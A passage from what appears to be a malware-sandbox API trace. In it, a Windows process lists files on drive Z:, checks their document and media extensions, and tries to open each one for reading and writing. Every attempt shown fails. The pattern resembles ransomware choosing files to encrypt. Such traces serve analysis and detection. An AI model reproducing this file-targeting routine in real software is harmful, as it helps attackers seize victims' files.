(in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ef0 | out: hHeap=0x2c0000) returned 1 [0181.094] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbaabff, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x2669c141, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbaabff, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xadfb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="fUgAWuSkZ3EbpCZ5Rvs.gif", cAlternateFileName="")) returned 1 [0181.094] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05a20 [0181.094] PathFindExtensionW (pszPath="Z:\\fUgAWuSkZ3EbpCZ5Rvs.gif") returned=".gif" [0181.098] CreateFileW (lpFileName="Z:\\fUgAWuSkZ3EbpCZ5Rvs.gif" (normalized: "z:\\fugawuskz3ebpcz5rvs.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0181.100] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05a20 | out: hHeap=0x2c0000) returned 1 [0181.100] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb83af9, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265c53b9, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb83af9, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x6fbf, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MwAvirxPiQV.swf", cAlternateFileName="")) returned 1 [0181.100] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0181.100] PathFindExtensionW (pszPath="Z:\\MwAvirxPiQV.swf") returned=".swf" [0181.104] CreateFileW (lpFileName="Z:\\MwAvirxPiQV.swf" (normalized: "z:\\mwavirxpiqv.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0181.106] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0181.106] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbdb947, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266cce83, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbdb947, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x1339b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="vfiyj.gif", cAlternateFileName="")) returned 1 [0181.106] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ef0 [0181.106] PathFindExtensionW (pszPath="Z:\\vfiyj.gif") returned=".gif" [0181.110] CreateFileW (lpFileName="Z:\\vfiyj.gif" (normalized: "z:\\vfiyj.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0181.111] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ef0 | out: hHeap=0x2c0000) returned 1 [0181.111] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb9737c, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265e287a, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb9737c, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x1526f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="USKBVwnLaYIUmcn.mp4", cAlternateFileName="")) returned 1 [0181.111] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0181.111] PathFindExtensionW (pszPath="Z:\\USKBVwnLaYIUmcn.mp4") returned=".mp4" [0181.115] CreateFileW (lpFileName="Z:\\USKBVwnLaYIUmcn.mp4" (normalized: "z:\\uskbvwnlayiumcn.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0181.117] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0181.117] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbd1d05, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266c3242, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbd1d05, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x86dd, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="s6JQB.pptx", cAlternateFileName="")) returned 1 [0181.117] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ef0 [0181.117] PathFindExtensionW (pszPath="Z:\\s6JQB.pptx") returned=".pptx" [0181.121] CreateFileW (lpFileName="Z:\\s6JQB.pptx" (normalized: "z:\\s6jqb.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0181.122] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ef0 | out: hHeap=0x2c0000) returned 1 [0181.122] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbd1d05, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266c3242, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbd1d05, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x9f6f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="sl70jWmP2ggACy.png", cAlternateFileName="")) returned 1 [0181.123] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0181.123] PathFindExtensionW (pszPath="Z:\\sl70jWmP2ggACy.png") returned=".png" [0181.127] CreateFileW (lpFileName="Z:\\sl70jWmP2ggACy.png" (normalized: "z:\\sl70jwmp2ggacy.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0181.129] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0181.129] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb83af9, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265c53b9, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb83af9, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xab59, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NBAT3tYNBcHdC.ppt", cAlternateFileName="")) returned 1 [0181.129] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0181.129] PathFindExtensionW (pszPath="Z:\\NBAT3tYNBcHdC.ppt") returned=".ppt" [0181.133] CreateFileW (lpFileName="Z:\\NBAT3tYNBcHdC.ppt" (normalized: "z:\\nbat3tynbchdc.ppt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0181.134] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0181.134] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbaabff, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266888c0, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbaabff, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x690b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="cdHLWs2KE.docx", cAlternateFileName="")) returned 1 [0181.134] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0181.134] PathFindExtensionW (pszPath="Z:\\cdHLWs2KE.docx") returned=".docx" [0181.140] CreateFileW (lpFileName="Z:\\cdHLWs2KE.docx" (normalized: "z:\\cdhlws2ke.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0181.142] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0181.142] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb8d73a, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265d8c3a, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb8d73a, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xf37f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SHCEF.gif", cAlternateFileName="")) returned 1 [0181.142] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ef0 [0181.142] PathFindExtensionW (pszPath="Z:\\SHCEF.gif") returned=".gif" [0181.150] CreateFileW (lpFileName="Z:\\SHCEF.gif" (normalized: "z:\\shcef.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0181.152] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ef0 | out: hHeap=0x2c0000) returned 1 [0181.152] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb83af9, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265ceffa, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb83af9, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xfcb7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="P6tWitG0.ppt", cAlternateFileName="")) returned 1 [0181.152] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ef0 [0181.152] PathFindExtensionW (pszPath="Z:\\P6tWitG0.ppt") returned=".ppt" [0181.156] CreateFileW (lpFileName="Z:\\P6tWitG0.ppt" (normalized: "z:\\p6twitg0.ppt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0181.157] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ef0 | out: hHeap=0x2c0000) returned 1 [0181.157] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafba0fbd, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x26675040, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafba0fbd, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xa32d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ZcPV3qk7PkeQOKKV.xls", cAlternateFileName="")) returned 1 [0181.157] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0181.157] PathFindExtensionW (pszPath="Z:\\ZcPV3qk7PkeQOKKV.xls") returned=".xls" [0181.161] CreateFileW (lpFileName="Z:\\ZcPV3qk7PkeQOKKV.xls" (normalized: "z:\\zcpv3qk7pkeqokkv.xls"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0181.163] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0181.163] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb9737c, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265e287a, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb9737c, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x134dd, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="X18sQ2pVfY.mp3", cAlternateFileName="")) returned 1 [0181.163] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0181.163] PathFindExtensionW (pszPath="Z:\\X18sQ2pVfY.mp3") returned=".mp3" [0181.167] CreateFileW (lpFileName="Z:\\X18sQ2pVfY.mp3" (normalized: "z:\\x18sq2pvfy.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0181.171] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0181.171] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb66634, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265771b7, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb66634, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xb1b8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="EOk7P095P.xls", cAlternateFileName="")) returned 1 [0181.171] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0181.171] PathFindExtensionW (pszPath="Z:\\EOk7P095P.xls") returned=".xls" [0181.178] CreateFileW (lpFileName="Z:\\EOk7P095P.xls" (normalized: "z:\\eok7p095p.xls"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0181.179] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0181.179] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb5c9f2, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265771b7, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb5c9f2, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x5bc5, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BDK13uXlqscCs2sGFIQ.doc", cAlternateFileName="")) returned 1 [0181.179] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05a20 [0181.179] PathFindExtensionW (pszPath="Z:\\BDK13uXlqscCs2sGFIQ.doc") returned=".doc" [0181.184] CreateFileW (lpFileName="Z:\\BDK13uXlqscCs2sGFIQ.doc" (normalized: "z:\\bdk13uxlqsccs2sgfiq.doc"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0181.185] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05a20 | out: hHeap=0x2c0000) returned 1 [0181.185] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbc80c4, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266af9c2, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbc80c4, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x14f79, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ow3Vle4.swf", cAlternateFileName="")) returned 1 [0181.185] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ef0 [0181.185] PathFindExtensionW (pszPath="Z:\\ow3Vle4.swf") returned=".swf" [0181.189] CreateFileW (lpFileName="Z:\\ow3Vle4.swf" (normalized: "z:\\ow3vle4.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0181.191] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ef0 | out: hHeap=0x2c0000) returned 1 [0181.191] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb79eb7, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x2658aa37, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb79eb7, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x11dda, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="KLUwMaQCvDlNDoCoQ3.xls", cAlternateFileName="")) returned 1 [0181.191] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05a20 [0181.191] PathFindExtensionW (pszPath="Z:\\KLUwMaQCvDlNDoCoQ3.xls") returned=".xls" [0181.197] CreateFileW (lpFileName="Z:\\KLUwMaQCvDlNDoCoQ3.xls" (normalized: "z:\\kluwmaqcvdlndocoq3.xls"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0181.205] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05a20 | out: hHeap=0x2c0000) returned 1 [0181.205] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb8d73a, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265d8c3a, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb8d73a, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x16f00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RBkxpRf3.m4a", cAlternateFileName="")) returned 1 [0181.205] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ef0 [0181.205] PathFindExtensionW (pszPath="Z:\\RBkxpRf3.m4a") returned=".m4a" [0181.210] CreateFileW (lpFileName="Z:\\RBkxpRf3.m4a" (normalized: "z:\\rbkxprf3.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0181.212] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ef0 | out: hHeap=0x2c0000) returned 1 [0181.212] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb83af9, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265c53b9, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb83af9, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x15a45, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="OCVoNePy.png", cAlternateFileName="")) returned 1 [0181.212] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ef0 [0181.212] PathFindExtensionW (pszPath="Z:\\OCVoNePy.png") returned=".png" [0181.216] CreateFileW (lpFileName="Z:\\OCVoNePy.png" (normalized: "z:\\ocvonepy.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0181.218] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ef0 | out: hHeap=0x2c0000) returned 1 [0181.218] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbaabff, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266888c0, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbaabff, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x166d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="dPc6HLBDbx19XugtWM.jpg", cAlternateFileName="")) returned 1 [0181.218] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05a20 [0181.218] PathFindExtensionW (pszPath="Z:\\dPc6HLBDbx19XugtWM.jpg") returned=".jpg" [0181.222] CreateFileW (lpFileName="Z:\\dPc6HLBDbx19XugtWM.jpg" (normalized: "z:\\dpc6hlbdbx19xugtwm.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0181.223] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05a20 | out: hHeap=0x2c0000) returned 1 [0181.223] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbe5588, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266d6ac3, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbe5588, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x16fbe, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ywcd6Y1iM3n9j4GZ20Ya.png", cAlternateFileName="")) returned 1 [0181.223] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05a20 [0181.223] PathFindExtensionW (pszPath="Z:\\ywcd6Y1iM3n9j4GZ20Ya.png") returned=".png" [0181.228] CreateFileW (lpFileName="Z:\\ywcd6Y1iM3n9j4GZ20Ya.png" (normalized: "z:\\ywcd6y1im3n9j4gz20ya.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0181.229] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05a20 | out: hHeap=0x2c0000) returned 1 [0181.229] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb52db1, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265500b5, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb52db1, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x873d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="3QVfoNUquygvYJYnxL.m4a", cAlternateFileName="")) returned 1 [0181.229] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05a20 [0181.229] PathFindExtensionW (pszPath="Z:\\3QVfoNUquygvYJYnxL.m4a") returned=".m4a" [0181.233] CreateFileW (lpFileName="Z:\\3QVfoNUquygvYJYnxL.m4a" (normalized: "z:\\3qvfonuquygvyjynxl.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0181.238] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05a20 | out: hHeap=0x2c0000) returned 1 [0181.238] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb5c9f2, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x26563936, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb5c9f2, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xc601, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AhsbCQy.csv", cAlternateFileName="")) returned 1 [0181.238] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ef0 [0181.238] PathFindExtensionW (pszPath="Z:\\AhsbCQy.csv") returned=".csv" [0181.244] CreateFileW (lpFileName="Z:\\AhsbCQy.csv" (normalized: "z:\\ahsbcqy.csv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0181.245] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ef0 | out: hHeap=0x2c0000) returned 1 [0181.245] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb83af9, ftCreationTime.dwHighDateTime=0x1d8a8a4, 